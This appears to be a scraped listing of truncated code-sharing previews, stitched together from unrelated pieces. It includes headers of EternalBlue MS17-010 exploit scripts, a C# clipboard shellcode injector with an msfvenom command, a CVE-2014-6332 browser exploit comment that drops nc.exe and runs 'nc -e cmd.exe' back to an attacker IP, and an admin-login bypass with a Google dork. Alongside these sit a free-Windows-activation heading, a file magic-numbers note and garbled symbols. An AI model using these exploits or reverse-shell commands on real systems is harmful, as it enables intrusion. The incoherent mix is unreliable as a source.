An guide how to activate Windows 10 AND 11 Pro for free
Your Windows license will expire soon or something that way. What do i do?
| <# block non-Exchange admins from PowerShell access in Exchange | |
| ProxyNotShell | |
| CVE-2022-41040 | |
| CVE-2022-41082f | |
| some bypasses have been found for the IIS block rules. | |
| need to hard block PowerShell for those that don't **need** it. | |
| Exchange allows PowerShell by default, block by exception. Not ideal, but workable. |
| // Using the clipboard as your code cave. | |
| // Generate your shellcode with msfvenom or whatever | |
| // Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin> | |
| // Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs | |
| using System; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace ClippySCInject |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| import sys | |
| from struct import pack | |
| if len(sys.argv) < 4: | |
| print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0])) | |
| sys.exit() | |
| sc_x86 = open(sys.argv[1], 'rb').read() | |
| sc_x64 = open(sys.argv[2], 'rb').read() |
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb, ntlm | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
Magic numbers are the first bits of a file which uniquely identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type.
For example, a jpeg file starts with ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF.....G ffd8 shows that it's a JPEG file, and ffe0 identify a JFIF type structure. There is an ascii encoding of "JFIF" which comes after a length code, but that is not necessary in order to identify the file. The first 4 bytes do that uniquely.
This gives an ongoing list of file-type magic numbers.
| Exploit Title: Supercon Direct login to admin panel without entering password | |
| Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices” | |
| Product Description | |
| ——————- | |
| Supercon delivers high quality, reliable and cost-effective IT services to customers globally. | |
| We provide world-class technology services by constantly exploring and implementing innovative | |
| solutions that drive long-term value to our customers. We have been providing solutions to clients | |
| across the globe for more than 5 years and boast of our extensive | |
| experience on website designing and development projects. |
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |